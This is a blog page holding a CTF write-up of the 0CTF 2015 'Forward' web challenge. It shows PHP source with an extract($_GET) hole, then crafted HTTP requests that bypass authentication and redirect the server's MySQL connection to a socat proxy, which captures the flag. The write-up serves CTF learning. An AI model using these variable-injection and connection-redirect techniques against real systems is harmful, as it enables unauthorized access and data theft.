<!DOCTYPE html>
<html lang="en-us">
<head>

  <meta charset="utf-8" />

  
  <title>0CTF 2015 - Forward (web 250)</title>

  
  
  <link href="//cdn.jsdelivr.net" rel="dns-prefetch">
  <link href="//cdnjs.cloudflare.com" rel="dns-prefetch">
  
  <link href="//at.alicdn.com" rel="dns-prefetch">
  
  <link href="//fonts.googleapis.com" rel="dns-prefetch">
  <link href="//fonts.gstatic.com" rel="dns-prefetch">
  
  
  
  
  

  

  
  <meta name="author" content="pwntester">
  <meta name="description" content="We are given access to a page and its source code:
&amp;lt;?php if (isset($_GET[&#39;view-source&#39;])) { show_source(__FILE__); exit(); } include(&amp;quot;./inc.php&amp;quot;); // key &amp;amp; database config function err($str){ die(&amp;quot;&amp;lt;script&amp;gt;alert(\&amp;quot;$str\&amp;quot;);window.location.href=&#39;./&#39;;&amp;lt;/script&amp;gt;&amp;quot;); } $nonce = mt_rand(); extract($_GET); // this is my backdoor :) if (empty($_POST[&#39;key&#39;])) { err(&amp;quot;Parameter Missing!&amp;quot;); } if ($_POST[&#39;key&#39;] !== $key) { err(&amp;quot;You Are Not Authorized!&amp;quot;); } $conn = mysql_connect($host, $user, $pass); if (!$conn) { err(&amp;quot;Database Error, Please Contact with GameMaster!&amp;quot;); } $query = isset($_POST[&#39;query&#39;]) ?">

  
  
    <meta name="twitter:card" content="summary">
    <meta name="twitter:site" content="@pwntester">
    <meta name="twitter:title" content="0CTF 2015 - Forward (web 250)">
    <meta name="twitter:description" content="We are given access to a page and its source code:
&amp;lt;?php if (isset($_GET[&#39;view-source&#39;])) { show_source(__FILE__); exit(); } include(&amp;quot;./inc.php&amp;quot;); // key &amp;amp; database config function err($str){ die(&amp;quot;&amp;lt;script&amp;gt;alert(\&amp;quot;$str\&amp;quot;);window.location.href=&#39;./&#39;;&amp;lt;/script&amp;gt;&amp;quot;); } $nonce = mt_rand(); extract($_GET); // this is my backdoor :) if (empty($_POST[&#39;key&#39;])) { err(&amp;quot;Parameter Missing!&amp;quot;); } if ($_POST[&#39;key&#39;] !== $key) { err(&amp;quot;You Are Not Authorized!&amp;quot;); } $conn = mysql_connect($host, $user, $pass); if (!$conn) { err(&amp;quot;Database Error, Please Contact with GameMaster!&amp;quot;); } $query = isset($_POST[&#39;query&#39;]) ?">
    <meta name="twitter:image" content="/images/avatar.jpeg">
  

  
  <meta property="og:type" content="article">
  <meta property="og:title" content="0CTF 2015 - Forward (web 250)">
  <meta property="og:description" content="We are given access to a page and its source code:
&amp;lt;?php if (isset($_GET[&#39;view-source&#39;])) { show_source(__FILE__); exit(); } include(&amp;quot;./inc.php&amp;quot;); // key &amp;amp; database config function err($str){ die(&amp;quot;&amp;lt;script&amp;gt;alert(\&amp;quot;$str\&amp;quot;);window.location.href=&#39;./&#39;;&amp;lt;/script&amp;gt;&amp;quot;); } $nonce = mt_rand(); extract($_GET); // this is my backdoor :) if (empty($_POST[&#39;key&#39;])) { err(&amp;quot;Parameter Missing!&amp;quot;); } if ($_POST[&#39;key&#39;] !== $key) { err(&amp;quot;You Are Not Authorized!&amp;quot;); } $conn = mysql_connect($host, $user, $pass); if (!$conn) { err(&amp;quot;Database Error, Please Contact with GameMaster!&amp;quot;); } $query = isset($_POST[&#39;query&#39;]) ?">
  <meta property="og:url" content="http://pwntester.com/blog/2015/03/30/0ctf-short-write-ups/">
  <meta property="og:image" content="/images/avatar.jpeg">




<meta name="generator" content="Hugo 0.59.0">


<link rel="canonical" href="http://pwntester.com/blog/2015/03/30/0ctf-short-write-ups/">

<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="format-detection" content="telephone=no,email=no,adress=no">
<meta http-equiv="Cache-Control" content="no-transform">


<meta name="robots" content="index,follow">
<meta name="referrer" content="origin-when-cross-origin">







<meta name="theme-color" content="#02b875">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="&lt;/pwntester&gt;">
<meta name="msapplication-tooltip" content="&lt;/pwntester&gt;">
<meta name='msapplication-navbutton-color' content="#02b875">
<meta name="msapplication-TileColor" content="#02b875">
<meta name="msapplication-TileImage" content="/icons/icon-144x144.png">
<link rel="icon" href="/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="/icons/icon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="/icons/icon-32x32.png">
<link rel="icon" sizes="192x192" href="/icons/icon-192x192.png">
<link rel="apple-touch-icon" href="/icons/icon-152x152.png">
<link rel="manifest" href="/manifest.json">


<link rel="preload" href="/styles/main-rendered.min.css" as="style">


<link rel="preload" href="https://fonts.googleapis.com/css?family=Lobster" as="style">
<link rel="preload" href="/images/avatar.jpeg" as="image">
<link rel="preload" href="/images/grey-prism.svg" as="image">


<style>
  body {
    background: #22313F;
  }
</style>
<link rel="stylesheet" href="/styles/main-rendered.min.css">


<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">



<script src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.2/dist/medium-zoom.min.js"></script>




<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video-js.min.css">



  
  
<!--[if lte IE 8]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/videojs-ie8@1.1.2/dist/videojs-ie8.min.js"></script>
<![endif]-->

<!--[if lte IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/eligrey-classlist-js-polyfill@1.2.20180112/classList.min.js"></script>
<![endif]-->


</head>
  <body>
    <div class="suspension">
      <a role="button" aria-label="Go to top" title="Go to top" class="to-top is-hide"><span class="icon icon-up" aria-hidden="true"></span></a>
      
        
      
    </div>
    
    
  <header class="site-header">
  <a href="http://pwntester.com/"><img class="avatar" src="/images/avatar.jpeg" alt="Avatar"></a>
  
  <h2 class="title"><a href="http://pwntester.com/">&lt;/pwntester&gt;</a></h2>
  
  <button class="menu-toggle" type="button" aria-label="Main Menu" aria-expanded="false" tab-index="0">
    <span class="icon icon-menu" aria-hidden="true"></span>
  </button>

  <nav class="site-menu collapsed">
    <h2 class="offscreen">Main Menu</h2>
    <ul class="menu-list">
      
      
      
      
        <li class="menu-item
          
          
          ">
          <a href="/post">Blog</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="https://github.com/pwntester">Works</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/tags/">Tags</a>
        </li>
      
    </ul>
  </nav>
  <nav class="social-menu collapsed">
    <h2 class="offscreen">Social Networks</h2>
    <ul class="social-list"><li class="social-item">
          <a href="mailto:alvaro@pwntester.com" title="Email" aria-label="Email">
            <span class="icon icon-email" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//github.com/pwntester" rel="me" title="GitHub" aria-label="GitHub">
	    <span class="icon icon-github" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//twitter.com/pwntester" rel="me" title="Twitter" aria-label="Twitter">
            <span class="icon icon-twitter" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//www.linkedin.com/in/alvaroms" rel="me" title="LinkedIn" aria-label="LinkedIn">
            <span class="icon icon-linkedin" aria-hidden="true"></span>
          </a>
        </li></ul>
  </nav>
</header>

  <section class="main post-detail">
    <header class="post-header">
      <h1 class="post-title">0CTF 2015 - Forward (web 250)</h1>
      <p class="post-meta">@pwntester · Mar 30, 2015 · 2 min read</p>
    </header>
    <article class="post-content"><p>We are given access to a page and its source code:</p>

<pre><code class="language-lang-php">&lt;?php
    if (isset($_GET['view-source'])) {
        show_source(__FILE__);
        exit();
    }
    include(&quot;./inc.php&quot;); // key &amp; database config
    function err($str){ die(&quot;&lt;script&gt;alert(\&quot;$str\&quot;);window.location.href='./';&lt;/script&gt;&quot;); }
    $nonce = mt_rand();
    extract($_GET); // this is my backdoor :)
    if (empty($_POST['key'])) {
        err(&quot;Parameter Missing!&quot;);
    }
    if ($_POST['key'] !== $key) {
        err(&quot;You Are Not Authorized!&quot;);
    }
    $conn = mysql_connect($host, $user, $pass);
    if (!$conn) {
        err(&quot;Database Error, Please Contact with GameMaster!&quot;);
    }
    $query = isset($_POST['query']) ? bin2hex($_POST['query']) : &quot;SELECT flag FROM forward.flag&quot;;
    $res = mysql_query($query);
    if (FALSE == $res) {
        err(&quot;Database Error, Please Contact with GameMaster!&quot;);
    }
    $row = mysql_fetch_array($res);
    if ($debug) {
        echo &quot;HOST:\t{$host}&lt;br/&gt;&quot;;
        echo &quot;USER:\t{$user}&lt;br/&gt;&quot;;
    }
    echo &quot;&lt;del&gt;FLAG:\t0ctf{&lt;/del&gt;&quot; . sha1($nonce . md5($row['flag'])) . &quot;&lt;del&gt;}&lt;/del&gt;&lt;br/&gt;&quot;; // not real flag
    mysql_close($conn);

?&gt;
</code></pre>

<p>We can inject any variable because of the <code>extract($_GET);</code> as long as it is not later overwritten. Thats usefule to bypass the <code>key</code> check and to get the <code>host</code> name and <code>user</code> using the <code>debug</code> mode:</p>

<p>Request:</p>

<pre><code class="language-lang-raw">POST /admin.php?key=NOKEY&amp;debug=1 HTTP/1.1
Host: 202.112.28.121
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,es-ES;q=0.8,es;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.112.28.121/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

key=NOKEY
</code></pre>

<p>Response:</p>

<pre><code class="language-lang-raw">HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:57:20 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 123
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

HOST:	162.243.129.228&lt;br/&gt;USER:	forward&lt;br/&gt;&lt;del&gt;FLAG:	0ctf{&lt;/del&gt;cd8b8ddac686f4ead123786fead8f9476e975b17&lt;del&gt;}&lt;/del&gt;&lt;br/&gt;
</code></pre>

<p>We can check that the server is allowing mysql connections on default port (3306) so what we can do is set up a proxy in our machine to receive the DB connection and <code>forward</code> it to the real DB server. We use <code>socat</code> for that:</p>

<pre><code class="language-lang-bash">root@www:~# socat -v TCP-LISTEN:3306 TCP:202.112.28.121:3306
</code></pre>

<p>Now, we can force the connection to go through our server and watch the traffic (query results == flag) going through the proxy:</p>

<pre><code class="language-lang-raw">POST /admin.php?key=NOKEY&amp;debug=1&amp;nonce=&amp;host=xxx.yyy.zzz.www HTTP/1.1
</code></pre>

<p>Intercepted traffic:</p>

<pre><code class="language-lang-bash">root@www:~# socat -v TCP-LISTEN:3306 TCP:202.112.28.121:3306
&lt; 2015/03/29 22:57:33.303951  length=95 from=0 to=94
[...
5.5.41-0ubuntu0.14.04.1.fo\v.\\2%bA]0t...\b...............z)Zi&quot;hgL)''-.mysql_native_password.&gt; 2015/03/29 22:57:33.527793  length=87 from=0 to=86
S..........@\b.......................forward......U..l.._....X....mysql_native_password.&lt; 2015/03/29 22:57:33.739001  length=11 from=95 to=105
\a..........&gt; 2015/03/29 22:57:33.963015  length=7 from=87 to=93
.......&lt; 2015/03/29 22:57:34.174384  length=9 from=106 to=114
.........&gt; 2015/03/29 22:57:34.398563  length=34 from=94 to=127
.....SELECT flag FROM forward.flag&lt; 2015/03/29 22:57:34.610552  length=96 from=115 to=210
.....-....def\aforward.flag.flag.flag.flag\f\b.0................&quot;......0ctf{w3ll_d0ne_guY}.......&quot;.&gt; 2015/03/29 22:57:34.834863  length=5 from=128 to=132
.....root@www:~#
</code></pre>

<p>FLAG is <code>0ctf{w3ll_d0ne_guY}</code></p>
</article>
    <footer class="post-footer">
      
      <p class="post-copyright">
        This post was published <strong>1669</strong> days ago, content in the post may be inaccurate, even wrong now, please take risk yourself.
      </p>
    </footer>
    
      
    
  </section>
  
<footer class="site-footer">
  <p>© 2017-2019 &lt;/pwntester&gt;</p>
  <p>Powered by <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> with theme <a href="https://github.com/laozhu/hugo-nuo" target="_blank" rel="noopener">Nuo</a>.</p>
  
</footer>


<script src="https://cdn.jsdelivr.net/npm/smooth-scroll@15.0.0/dist/smooth-scroll.min.js"></script>



<script async src="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video.min.js"></script>




<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      displayMath: [['$$','$$'], ['\\[','\\]']],
      processEscapes: true,
      processEnvironments: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
      TeX: { equationNumbers: { autoNumber: "AMS" },
      extensions: ["AMSmath.js", "AMSsymbols.js"] }
    },
  });
</script>
<script type="text/x-mathjax-config">
  // Fix <code> tags after MathJax finishes running. This is a
  // hack to overcome a shortcoming of Markdown. Discussion at
  // https://github.com/mojombo/jekyll/issues/199
  MathJax.Hub.Queue(() => {
    MathJax.Hub.getAllJax().map(v => v.SourceElement().parentNode.className += ' has-jax');
  });
</script>



<script src="/scripts/index.min.js"></script>

<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('\/service-worker.js').then(function() {
      console.log('[ServiceWorker] Registered');
    });
  }
</script>








  </body>
</html>
